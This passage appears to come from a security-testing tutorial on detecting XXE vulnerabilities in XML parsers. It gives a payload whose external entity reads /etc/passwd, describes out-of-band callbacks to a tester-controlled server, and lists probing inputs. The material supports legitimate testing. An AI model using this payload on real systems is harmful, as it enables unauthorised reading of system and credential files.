The process to detect this kind vulnerability in general is as follows:
- If it's possible, download an XML document generated by the application so you know the structure. If not, create a simple template, like this:
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ] > <foo>&xxe;</foo>
- See if it's possible to add a reference to a resource; a good trick that's commonly used by attackers is to generate a reverse response that could be captured in a server where we have control—something like this:
GET 144.76.194.66 /XXE/ 10/29/15 1:02 PM Java/1.7.0_51
- If it's not possible to add an external reference, but you receive an error, modify the request and submit tags:
<cosa></cosa>
To test. If the error disappears, it means that the parser is accepting the tags as valid, so it might be vulnerable.
- Also, you can try entering data before or in the middle of the tags, as it needs to be valid for the parser, and sometimes the parser is waiting for a value:
Foo</cosa> Foo</cosa></cosas>
- If this continues without any errors, try to create a reference to a resource, internal or external, and look at the result.